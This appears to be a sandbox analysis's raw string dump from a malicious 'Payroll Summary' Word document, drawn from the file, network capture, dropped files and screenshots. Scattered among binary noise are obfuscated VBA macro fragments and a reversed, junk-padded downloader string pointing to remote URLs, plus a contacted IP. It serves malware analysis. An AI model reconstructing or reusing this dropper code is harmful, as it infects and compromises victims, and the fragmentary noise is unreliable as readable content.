2 3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3
Ansi based on PCAP Processing
(network.pcap)
2!!22222222222222222222222222222222222222222222222222"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
22JYxMGVQ"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2652VON0oD%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2@9a0DABA!RhYQQ@JrhdAq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2FhsF+Y\n:3E[69`&45Z!*5k8`Fmw-"d>zn"ZxJZp;{/<P;,)''KQk5qpN8KGbe
Ansi based on Dropped File
(~WRD0000.tmp)
2mA!OfficgODficg!G{2DF8D04C-5BFA-101B-BDE5gAAe42ggram Files\@CommonMicrosoft Shared\OFFICE16\MSO.DLL#M 16.0 Ob Library%z4@zTZADLcFXJtFREGTZ@ADL@7FXJnFREP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2p;JXuiQB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2Q^HG-o.&y,G||Hk2mIpBke~-G5p?j}s#QEzR g@CCo$akDk~ _-,Yd[mam:a:.Y9^^)'^53Fem^^53F^c>GKuUt+(vR<G3#gG;?<i9Gg54`u$F95SBgoh %@f'M{qQ,qTQ`^c)F-^]l9YK86=
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2RvIPSNiRHXmaMztiX! jUMV}(CmDiI1uViT,9784A3`hUdPw!1AFLiVlfz653292QirQR?32509#vOdPSj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3 3$3(3,3034383<3@3D3H3L3P3
Ansi based on PCAP Processing
(network.pcap)
3065"`vvXph!R
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
32621@cWBwS73x`IjfaPpS bCoZs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
326AV7KVDXn3907woP @
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
38*1UwrUMpQ4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
393a31B8@"9393`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3c2DaSUXB823`* XWpNuEQ1(9aIbUBT6atfCbBAvjqHKYn
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3D3L3P3T3X3\3`3d3h3l3p3t3x3|3
Ansi based on PCAP Processing
(network.pcap)
3K4'+rzQ
Ansi based on Dropped File
(~WRD0000.tmp)
3LcIZhB3wdEOQ3iPFGn`YsGFvFlDlPGGwBRPlJz=%mKF033ql, -`n ivcJPpOZEWsizGGr[FltKUBOB1273UBoVJBKe24pjUKVu0840 c1izH&S82(MpqpAV0418
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
3QNxHA+FGQiI'Qg7B>AMQwY-'Ym,,t
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4 4$4\4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
41@2KCrItA69041JX ivPwP6836aLajmWJwHfcWA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4245BS8bPsq* GBIIwE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
43980,klm1'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4429jNjBO8203 * NFaHudStr(9 7948),aQNjqQicmVOPEnd [
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
484@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
4<MX/OZ2H!cD 7IC9ExC9EMX/OZ2H!cME(S"SS"6"(1Normal.ThisDocument0(%`%(%*`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4aWW000X000X0rU@(`/(A`/(`/$`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4F+8JI$rVLvVxNN";fVYx-,JfV<+k>hP!aLfh:HHX WQXt,:JU{,Z BpB)siE4(=U\.O.+x"aMB[F7x"ytK-zz>F>75eo5C9Z%c7%6M29B"N
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
4fiIIsowkw9zu1c1c1c1c$' ' O NXX n DX X' ' S U vXX X X'miYJYs&&!%TjDEXVkGksKp%!4iJh$' ' # % XX A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5 5$5(5,5054585<5t5|5
Ansi based on PCAP Processing
(network.pcap)
5* aLzqLjU263"4AVq6BDvpuMZD`++zPHvPqrDOGFFzX(qqfqsASq0qVzNB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5082~EmbB<80bRzDlZ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
55894"wwEBa`5264@WiSdHL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
56X* jZGkJC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
570KMqatvUhjlU@qcuLdb.8Z59uesf7P82066?J$_"0wMvJHlpMDPBs@bIRmK(UnUL0uoYTbQ1!81@mFRcGi5660wIbi|XoPRIPjCvXhz!5@vYcMwre84r'bijTVq0jdbboM0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5758fuMlVxiAAu =mjjFqa941AUoABHTe83487q6rZHTparPdJvKphzufIAccjic.vQCVAP(EltvKLpXG34EVrGDVw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5aGOLLwB!3925CvhwPNh0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5CuazX.QB0ljhBFn`9 wpQUbv!3Om0VrmfhhwfOl0aYofqzcWsEp$"WWJRAHC[+1P01][+75C[( eCAlpEr-69]iw.412 L+ A, %50 `itbVQZ OCYaVc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5P5X5\5`5d5h5l5p5t5x5|5
Ansi based on PCAP Processing
(network.pcap)
5Q@LbpUXX(363]zllLr@746A]duGXL'39646A]wZNG]azAUd'tMMvPYQ#wQpJm("t.mU9+u.oc.yeladhtiDek//:ptW3mZ", 1`5@)A382+$@wSCNOA$BUjPjfOZzj(SwdQGpHciCkQ66436L HkajsL4306FuTuRKivBe4753MXCkzAR2* mHZwrS!L4467LAmLvnFNmzBL@(HsMznz@$LKiaZZ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5W5WIntb ZAZjtTrjl5F$'$X ' O t XX ) X X''l
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
5XcR=%RsCOuwtHJRpYL% 3a$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6 6$6(6,6064686<6@6D6H6L6P6T6
Ansi based on PCAP Processing
(network.pcap)
6 6$6(6,606h6p6t6x6|6
Ansi based on PCAP Processing
(network.pcap)
6 kOfWrnZBf% tes&&r^e=%Sf.W,$'<
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6&&IEGv;FO\4-Sra)RmNAlK[D!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6'gpc_48.gRLB@lr++cxg]u{[+-JG_#G*>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6.0 built by: WCSETUP
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
6071RcMJdmV`880P-irAqs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
64062AdSlPuwhVQvUtF(NTKLZ$XsjLj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
64318$G BOzwJ69832 * TQbLt5Str(@46314)-I`HphHsw KjHBsRvKXfTIFJmBAQQDtHUQmzjftdaLl86085APzIotH=20461PHwXznO70705mGqrEF 49019OfELiUlP80369PuXtbqH1PKlwQvfPRanZswQpJm("Y0BU9nar 6)tQO*+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
667v2wjCzaJ59490B
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
69OJmsA216171dz iikWriqphw YETmF WTjMH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6`?@nlkfhT"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6u>V<w.>aJWU-uTr7z]iWRE+X{cX_cq?'t3U^VGi!sY7{[og~:_^}6+gmKz~oeE^^X4z'GuM8c?k*}6T*(XB?eMCb(N`((((((((((((q(9?R5q'#aj-&2qwG{rs$_Hn*Dd~^xzOXSTQs}a&8]*AIy~+A R?5oWN+Eo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6XX -M X X'e. "' & ( *o% ,VXX . 0X 2 4X'$oX <': @ B D F;XX Hv J,X L NX'>ta.DuroH@nAttribute VB_Name = "zTZADLcFXJt@FRE"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
6ZZJqm4tBBBBB$'L P'N T Vs2 Xz ZeXX \T ^
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7 7$7(7,7074787<7@7D7H7
Ansi based on PCAP Processing
(network.pcap)
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7
Ansi based on PCAP Processing
(network.pcap)
7 XXX n> X X'bkR,mU9+mU9/mU9+mU9/:pttmU9+G.3333$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7-A?>iO6~{v5-89F.<G8#5NbpUckE @9E((((((((((((((((((((=x>Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@((((JXip/lg;>116*O+v
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
703UaSdJLATo702vmszBN35296uHjJlo774UIFKXVhJH2fPRtRoqAase5XcR=%RsCOuwtHJRpYL ap47362, %14#@ATM0&= zABlzYiPQL(imSJB wiIYRp 25FLOTbT3&Q
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
70888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
Ansi based on PCAP Processing
(network.pcap)
71800A$qIjPw27579 * jUtv50555ylBNhc4ioIKzDPiJohHRRRrE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
75075%AwqoZcp7* cbzXEiT%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
77107$LnzlWW44716 * QzfNYh6Str(@79242)[R0iTzT>NaPLIcEnd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
776#WOSuMpCZTvldhdBs6V TGHTG`Gq jH2LX742`+ pJ$"XtcRfflumHXJ UfPwj@EBwobGHYv,PVp25aKAoA3808
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
785wLvi60`2zMIplv506 CTzwTm!%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7872#ojjoBw!o8208$WzsjO7673XiPcIAlBslONhiDbVW0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7_?m-{UBw<w_$#[8{(/$0hF{L)#7i%=A:s$),Qg20ppf
Ansi based on Dropped File
(~WRD0000.tmp)
7p$NwjKbA203!BUrcG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
7w2m@s^{4}X6pR9$fOK$l%n8'Pk'f>i..yi%`-IQcO0zg!ej
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8
Ansi based on PCAP Processing
(network.pcap)
8$9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9
Ansi based on PCAP Processing
(network.pcap)
8'6 < >| @ BzXX DF F2X H JX':
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
81.21.67.85
Ansi based on PCAP Processing
(PCAP)
82I LEnrv&#TSRaT!#EoHkS$#5FZ9th}@a[]qwf4j67Mt/'.arBenegnc"fi//wth dpP90uCa!E602342 E$03`BcJNpMMHl08o
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8558"TcDjJBRV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
875E* IOYTB754bUtclGB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8918kdiBALS21517B@DWQVMm@83705
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
892DEEhW`ouib
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
8PK!0C)theme/theme/theme1.xmlYOo6w toc'vu-MniP@I}ama[4:lGRX^6>$!)O^rC$y@/yH*)UDb`}"qJX^)I`nEp)liV[]1M<OP6r=zgbIguSebORDqugZo~lAplxpT0+[}`jzAV2Fi@qv5\|NleXdsjcs7f
Ansi based on Dropped File
(~WRD0000.tmp)
8PK!g theme/theme/theme1.xmlY?4}O3d=HTwbS.&!,.1$?"[UR0aF0t~{S^&\t$z=!Q@o?_EG2@>GRU1a$N%KjVkUDRKQj/dR*SxMPsJ5$4vq^WCD{>`3REB=UtQy@\.X7<:+&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9263AeYwWhNB@Rtsozb(k hWJUo@$FuuQh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9479bu8dJSbopss8534GQsAkaXp69!loh CC@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
94922bAmup.259Q_EbqGDEJU-906sQ0wfwstKlHo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9672UULYvpbS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9848B9#dBkZ10208 * cVKBZ4Str(43104)WEYJifO= KRRIEZYsnKJYcRBVbvpi(@IRTAFY.k QSjTQ27562PdDcWq>30454APScGoUP483PKVmmiv35230P XnPXYP90150PswEwl0PsNHnOwPqtQDNzPzwjlS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9?6U0X}yU72`t&'dvTsHp&?:D|W>7T>,xV?^>G#|rh[ZxwOVYVEc=kR,&$KE2B(((((((((((((_G_G3?O9*uOF37S/-xGR~gEyXkk=/Op+uAt\H2~EC_7/l?_;o4_"y1?~(lB)H!yd`Yx.^kW\G ?]8yh'72~+JEF401ZlY/}9Q^!G;
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9dTjUFdmk%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9eJ AfBPV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
9H9P9T9X9\9`9d9h9l9p9t9x9|9
Ansi based on PCAP Processing
(network.pcap)
9KwlUfBUd7478ba0ICmpXNpQT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
: :$:(:`:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:<:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:@asjHJXS AZjXP DDaTS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
:ActiveX
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
:KhaljHrPEoYWh/MnzvitlhLDG9aOhEfuUXvcfdjQWaj9aIiljs>OzPiZHJnubQjAzkjGHQTiHAboiDznLl`BQzCwamLbf.kWSoitciPECz>PnGQfPGwkhHqMMwYvHhVsHiwkDEW?hzjsfckzwQuVELARIA0RljnjZdqIuSnXM$jnkMCAxLZSqzr-pZUvwSkGwutoP&GzrzcMvwlBVNVYXYmwFzifntthqwZ9zrpCROFwjjoo]iSCNs5QTncHQ\GJQUO+VHXWtJerzocPOgljSHaW|llfVuRfJGwToHLTWAZXTilvvpWmiC7wdSnWzTYkCHFSQKZ,VTfGrTvKfZXwWKpXwLJ1RahjrcqrLMvQCwMwDtbSaWihNmXancbc*jNfKkB]PVwSdLqMcbtR+MuszVvzYkTokjmSULDEaQww:LjKuvTnKOUv}aiJSOCvbwoazWW8lqnZE#YBMAJ.dRtbEzAVvICCWIMYf~zkJLXUrAYbQJC=WzGdl|sRXULwrABpjq>-OujdzzpuhjaXDAQDXlzcovn/NLRQoDY:DEEhW'kouibFmLHVORhKlBbjB,SmZcwv"LzqMAC*ABEmrNAiEjifo3rWuwUbUVIJwCZnVvrLZsjF^
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
:X < >X'.X B'@ F H8 JA LXX N PYX R TX'D
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
; ;$;(;,;0;4;8;<;@;x;
Ansi based on PCAP Processing
(network.pcap)
; =d%T,om3h-6JN.Oh-@6F4RPvEJ6( k*Ak*Mm.>PkTICv27Y}2t"!Za@-(SQEQ$R$C\
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
;-._,-._,-.
Ansi based on Image Processing
(screen_0.png)
;T;\;`;d;h;l;p;t;x;|;
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<l<t<x<|<
Ansi based on PCAP Processing
(network.pcap)
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Dropped File
(~WRD0000.tmp)
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>L#@0(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
<i#fKS4(}M:N\W`mR\iX%}Iut0=k>kJ#Tf_dZ/RNXFIVnu Cij(&Kh4nB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
<l=r=x=~=
Ansi based on PCAP Processing
(network.pcap)
<X X'$ ' 2 %XX =X X' L 8 z
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
= =$=(=,=0=4=8=<=@=D=H=L=
Ansi based on PCAP Processing
(network.pcap)
= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
=$'~& ' @ * XX Tx X X' ' D iPXX % X X''JmU9+spnZBf%!!%RsCOukicia|a|a|
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
=$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=
Ansi based on PCAP Processing
(network.pcap)
=4><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
Ansi based on PCAP Processing
(network.pcap)
=i3$g3vt(tw8bF62J[=Udazz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>
Ansi based on PCAP Processing
(network.pcap)
>(?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
>bOZZse14552AbXkRCR924@* LWzTDhe3@A5af0EwpAbVAmWScwAkELTD@d>w02;)CDSAx34 U91 ,U9H)(p$e9g NDtfi`rtSoTlqsv929734wb, E66$ljGSmk@ tKLaL9jmvUh(DwvJak`suWwvr4258ec rEDNS 644'9KUdmw990$iFRoZb5367 9@zrBsHw$7600BcfUWrrHPEfnA`oCahOAHjokjB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
>Root EntryWordDocument
Ansi based on Dropped File
(~WRD0002.tmp)
>tkI.Ox"dWt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
>VYUb;bjbjGG.%d%d+++++????K?WWWWWFFF]]]]]]$<!*+FFFFF++WWZZZF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
?\&$*\Rffff*0<5cd8073f4&"bx"bdh`p"bPfX"bH`dh"bPfXd0"8@bH 0'. 4 6Wt 8% :MXX < >~X @ BX'2lato J'H N Pl RFw T)XX V XX Z \X'Ltu `'^ d fF ho jyFXX lp nY-X p rX'b v't z |y ~ XX G EvX X'xo(X ' .8 0XX +y |X X'58.72 ' R l
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
?L?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
@$y>U1I>+3BF"*)XwvTMNr+m\kaTJzR@E!csI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@1AdKTm.YAB2GjmJwm(64514(aBAYi!(5691BiHzMuAiLLMJC ZiFiT0zufSGR7izc[,)901]raHc[+$5875(EcAlPer-),')7]@943@[eCrtf82p42388b,: F9uwmawHWuTop
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@1cDqEX`00QtmpFLSu52px2izLuOATzGT!RbAHnuicl
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@6u2bjnqC4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@=s.]xjW5gWH@VUbNpP)gY=W^5cVOGGH*x4FK/ZQDyePdCp=A8M-sw>MEu-+XXomne-%\4`8,>b6h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@`eVQ<BmuOs(-R8&;O
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@Aq-QEQER sih((ByREPEP$2r}h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
@aUPkBz(YhkAPVUiVu1A6(@YjTvzp68463E(nTVot(83577AWfWli94338(LCdzbME(77145A(ztozYAtA(TmLOA@(N OLVSL@$wzIizt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@DFKai-SB
Unicode based on Runtime Data
(WINWORD.EXE
)
@DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@dUojswlUfUOaICmpOXNpQTv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@hzTwZJ!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU_HKSCS-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS UI Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@N!Y]i-TnRB8zmmwSRtO"i32<`3xSP]"M9;
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@ocHjsC(iiJIQLqEdjX96136A$qpbDn199cqMofSdj@29py3BBZZCr|@* zfvbLFAPt90AAoKuzmqEsQSpi0DvLwDD@sGPRq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@PMDtoM(jDthiT /@ jTCfj26953Fix(lFBKMG))b75181QCLng(WIkWjT91490fqVwN28050 * aUcUVvStr(8709)-BbdHCbGtDhlQ@jjNdYAIjmcSfw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@PMingLiU
Unicode based on Runtime Data
(WINWORD.EXE
)
@pmWAVcQlnMCZ+QIUBQj76795
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@tthqwZP(0zrpCwjjo19429UniJsp9AR QTncH72819BGJQU92JVHXWtJ27441rzocPOP@ljSHaW@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@uYuUfZLiVibUjrBjW7383czVhRR9 C3a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@YzrqFa|aCOYjz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
@}w7c(EbCA7K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
[ m=|ImCUqqV9p>H&QXlXxW\mkW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EE2989979980][O00000000]*C:\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EE2989979980][O00000000]*C:\09172 Payroll Summary.doc
Unicode based on Runtime Data
(WINWORD.EXE
)
[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
[Host Extender Info]
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
[W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
[Workspace]
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\>XX ^ `X b dX'T h'f l nEP pO r1XX t{ v9X x zX'jY0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2,UUUU$'| '~ P r<XX fJ /$X X' ' Q '~ oXX MSX X'PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+mlOOOO$' ' m t BVXX PX X' ' k 'w |XX QT X X'=eiEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEpQQQ^Q$' ' Z i |QXX L eX X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\^[A:P=q[pFR#1[#7I=nwU::gQ6kHmF-VUX2yKYw;~@r=co|?PVyG,8ht.o&I#H .|sam%a%m&.u(O"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\Z8WRxY5xkX{o,AqI'J(>}JK|G}$obDp] d`soLuYm\U+qer:>V%rc8m_WOJ}K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\|'m#W$mx2.2+A=h'QnpZ/?X5lyY8u9tIN4[)f6~dh#Oo:muZIYX{*QG~L{ww$Mq&::XozM'zSC%`amKq&{sqKu-4m ch
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
\|'m#W$mx2.2+A=h'QnpZ/?X5lyY8u9tIN4[)f6~dh#Oo:mu{ZIYX{*QGKx[WyD7b61$ulW{H$A8kVSx&_3}Qg,s=O15]f[j,g''}'Z3|;xFS\G6cw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
]ZkDK8I=^{E[\6wygMmqa(?r8Z"xhk,-^C:91',Z+mq{xRkmI=zW0(([$l7g9G!y6|djJ],x&m&Dw.bD(Z9v1.rzs=^yRh'5`I!d
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
^([2+xt=RQZzy=Fog1pP?d^O}3Y7_}s2C#f[-=O+)W^1MEG+xYyi[M*!=W0i&aP*cJ.G\duSq]2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
^`dhBd dD@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
^smkq<'ldZme5tSG8Pm#|:~^[,ka&&f5{7VR"4[v`v`1-=]Dx#eDj>ND.Y7|Fs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
_0em____ofFce_365
Ansi based on Image Processing
(screen_0.png)
__::_::__
Ansi based on Image Processing
(screen_5.png)
__?m?J?__?_q___?????v_,?_?_???__,_____??_J,m____L___
Ansi based on Image Processing
(screen_9.png)
_______Find'
Ansi based on Image Processing
(screen_5.png)
__Ah|yABLyR5|D|5
Ansi based on Image Processing
(screen_9.png)
__Replace
Ansi based on Image Processing
(screen_5.png)
__SRP_1$__SRP_2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
_A6NS KV\ItKyV;o?>&&b63/|r'g;E/V}O*o~Kkq?rk|e>K"]=J!gj31+^v_V{WN)tx/-f=*O^#9(.-4L@-@=VVgGmu|*\gr{gSB^UFiG2KzGKZm?[;S/u&iG`2#]U|V<W]*PzzmynC)xRk0P"ld`?z=}^sXoZ!~AWduZY0pv{5QK1I&#m}5]707lSS]05g2LFm9:F$o5f3O0wi",
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
_CQW0j0D0
Ansi based on PCAP Processing
(network.pcap)
_CQW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
_g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
_l.8_0''._
Ansi based on Image Processing
(screen_5.png)
_L0ckW0O0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
_Norma__Nosaci
Ansi based on Image Processing
(screen_5.png)
_peL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
_s_gt_qsg_gct_
Ansi based on Image Processing
(screen_5.png)
_uiRM.Y<VaW8m>W7./\Vh$5vy"dP,YOw:DZV.b9
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
